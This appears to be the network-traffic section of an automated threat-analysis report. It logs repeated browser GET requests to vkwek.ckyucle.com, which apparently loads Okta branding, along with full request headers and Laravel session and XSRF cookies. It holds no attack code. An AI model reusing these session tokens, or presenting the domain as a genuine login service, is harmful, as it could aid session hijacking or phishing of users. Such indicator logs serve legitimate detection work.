laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /qr6FfLhLZ5QwaGe5HJsDHUaandv4RUef6Ia8VBkiV1U467140 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /kldibCibzXsTOdNtNAZcyznJMPZFnrycjnb52eIM56170 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /mnP7Z0RTacSIM9CxKvK5WayGyklgNKAsEypvOzHpfU2cP90150 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /opQX1gSU09O17E3k10USpNWJby3griWtsKreijbClabV2GbvNaQkTef200 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /wxygRZbM3kOCvEcFjIDlEKamnOMWqU6ryQDaTnQ90180 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /ijGLf8KcAmo8F8uFMIwMKt5jWtydfJOdOqrh5153ZvUBo56RjXXwgHIOxu3KbwiSDyz230 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /rfrj4D3IOrBb34OKfQNxY9akOmZckEWxXo9xwrWKJaQReBHFIHg5kn2 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /opQX1gSU09O17E3k10USpNWJby3griWtsKreijbClabV2GbvNaQkTef200 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /uvhQlfoMbJ4XJRFtu2qrnZlpt9TrWXuaMNtQnfO12130 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /wxygRZbM3kOCvEcFjIDlEKamnOMWqU6ryQDaTnQ90180 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /mnP7Z0RTacSIM9CxKvK5WayGyklgNKAsEypvOzHpfU2cP90150 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /ghUQ6Orlc7xuQgWcYlBAqViojmkfQHsxQ81JqDSmnddnAwJvMkE5kY34tjef210 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /qr6FfLhLZ5QwaGe5HJsDHUaandv4RUef6Ia8VBkiV1U467140 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /kldibCibzXsTOdNtNAZcyznJMPZFnrycjnb52eIM56170 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 